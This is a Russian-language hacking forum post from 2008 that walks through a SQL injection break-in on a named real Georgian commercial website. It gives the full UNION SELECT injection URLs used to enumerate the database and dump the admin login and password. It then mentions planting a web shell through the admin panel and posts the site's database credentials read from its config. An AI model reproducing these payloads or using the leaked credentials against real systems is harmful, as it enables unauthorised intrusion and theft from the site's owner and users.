|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
С нами:
9420866
Репутация:
228
|
|
грузинский сайт:
http://www.geoimport.ge
Код:
http://www.geoimport.ge/index.php?lang=eng&id=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(version(),user(),database()),15,16,17,18,19,20,21,22,23--
version() - 5.0.51
user() - geoimport_ge@localhost
database() - geoimport_ge
Версия > 5 => есть information_schema:
Код:
http://www.geoimport.ge/index.php?lang=eng&id=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,table_name,15,16,17,18,19,20,21,22,23+from+information_schema.tables+limit+1,1--
Перебираем лимитом. Видим интересную таблицу:
c_config. Рассматриваем ее тоже лимитом:
Код:
http://www.geoimport.ge/index.php?lang=eng&id=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,column_name,15,16,17,18,19,20,21,22,23+from+information_schema.columns+where+table_name=0x635f636f6e666967+limit+1,1--
Ничего интересного, идем далее.
Приступаем к ее изучению:
Код:
http://www.geoimport.ge/index.php?lang=eng&id=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,column_name,15,16,17,18,19,20,21,22,23+from+information_schema.columns+where+table_name=0x635f6d656d62657273+limit+1,1--
Сразу же находим username. Записываем в память 
Нашел таблицу c_members, но та бесполезная...
Находим еще кое что интересное: c_users...
Идем далее...
Находим login и password...
Выводим:
Код:
http://www.geoimport.ge/index.php?lang=eng&id=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(login,0x3a,password),15,16,17,18,19,20,21,22,23+from+c_users--
Result:
admin:geoneo2008
Ну в админке там ваше шелл лить - нет проблем)))
С помощью шелла узнал в конфиге ето:
server: localhost
db_username (and db_name): geoimport_ge
db_pass: x3f5h6a54sdg
Последний раз редактировалось USAkid; 17.09.2008 в 08:20..
|